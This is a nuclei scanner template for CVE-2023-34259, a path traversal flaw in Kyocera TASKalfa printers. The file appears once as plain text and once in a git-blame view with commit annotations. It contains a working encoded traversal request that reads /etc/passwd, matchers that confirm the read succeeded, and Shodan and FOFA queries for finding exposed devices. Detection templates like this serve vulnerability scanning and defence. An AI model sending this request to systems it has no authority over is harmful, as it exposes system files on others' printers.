nuclei-templates/http/cves/2023/CVE-2023-34259.yaml

id: CVE-2023-34259

info:
  name: Kyocera TASKalfa printer - Path Traversal
  author: gy741
  severity: medium
  description: |
    CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
    - https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
    - https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
    - https://sec-consult.com/vulnerability-lab/
    - https://seclists.org/fulldisclosure/2023/Jul/15
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2023-34259
    cwe-id: CWE-22
    epss-score: 0.00559
    epss-percentile: 0.77589
    cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kyocera
    product: d-copia253mf_plus_firmware
    shodan-query: http.favicon.hash:-50306417
    fofa-query: icon_hash=-50306417
  tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer

http:
  - method: GET
    path:
      - "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: server
        words:
          - "KM-MFP"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950
Create CVE-2023-34259.yaml CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-10-08 08:53:15 +00:00			`id: CVE-2023-34259`

			`info:`
			`name: Kyocera TASKalfa printer - Path Traversal`
			`author: gy741`
TemplateMan Update [Tue Nov 14 05:56:48 UTC 2023] :robot: 2023-11-14 05:56:48 +00:00			`severity: medium`
Create CVE-2023-34259.yaml CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-10-08 08:53:15 +00:00			`description: \|`
			`CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.`
			`remediation: \|`
			`Upgrade to the latest version to mitigate this vulnerability.`
			`reference:`
			`- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/`
			`- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html`
			`- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html`
TemplateMan Update [Fri Nov 3 10:59:12 UTC 2023] :robot: 2023-11-03 10:59:12 +00:00			`- https://sec-consult.com/vulnerability-lab/`
			`- https://seclists.org/fulldisclosure/2023/Jul/15`
Create CVE-2023-34259.yaml CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-10-08 08:53:15 +00:00			`classification:`
TemplateMan Update [Tue Nov 14 05:56:48 UTC 2023] :robot: 2023-11-14 05:56:48 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 4.9`
Create CVE-2023-34259.yaml CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-10-08 08:53:15 +00:00			`cve-id: CVE-2023-34259`
			`cwe-id: CWE-22`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.00559`
			`epss-percentile: 0.77589`
TemplateMan Update [Tue Nov 14 05:56:48 UTC 2023] :robot: 2023-11-14 05:56:48 +00:00			`cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware::::::::`
Fix Matcher and Panel Move around 2023-10-09 08:18:46 +00:00			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
Fix Matcher and Panel Move around 2023-10-09 08:18:46 +00:00			`max-request: 1`
TemplateMan Update [Tue Nov 14 05:56:48 UTC 2023] :robot: 2023-11-14 05:56:48 +00:00			`vendor: kyocera`
			`product: d-copia253mf_plus_firmware`
Fix Matcher and Panel Move around 2023-10-09 08:18:46 +00:00			`shodan-query: http.favicon.hash:-50306417`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: icon_hash=-50306417`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer`
Create CVE-2023-34259.yaml CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-10-08 08:53:15 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "root:.*:0:0"`

Fix Matcher and Panel Move around 2023-10-09 08:18:46 +00:00			`- type: word`
			`part: server`
			`words:`
			`- "KM-MFP"`

Create CVE-2023-34259.yaml CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-10-08 08:53:15 +00:00			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950`